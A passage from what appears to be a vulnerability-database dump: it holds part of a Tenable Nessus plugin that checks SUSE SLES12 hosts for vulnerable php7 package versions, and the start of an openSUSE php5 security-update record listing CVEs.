script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11628\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php7-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bcmath-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-bz2-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-calendar-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ctype-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-curl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dba-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-debugsource-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-dom-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-enchant-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-exif-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fastcgi-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fileinfo-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-fpm-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ftp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gd-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gettext-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-gmp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-iconv-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-imap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-intl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-json-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-ldap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mbstring-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mcrypt-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-mysql-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-odbc-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-opcache-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-openssl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pcntl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pdo-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pgsql-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-phar-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-posix-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-pspell-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-shmop-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-snmp-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-soap-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sockets-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sqlite-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvmsg-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvsem-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-sysvshm-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-tokenizer-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-wddx-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlreader-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlrpc-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xmlwriter-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-xsl-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zip-debuginfo-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-7.0.7-50.9.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php7-zlib-debuginfo-7.0.7-50.9.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php7\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:31:02", "description": "This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 18, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2017-09-06T00:00:00", "title": "openSUSE Security Update : php5 (openSUSE-2017-1010)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2017-09-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-fileinfo", 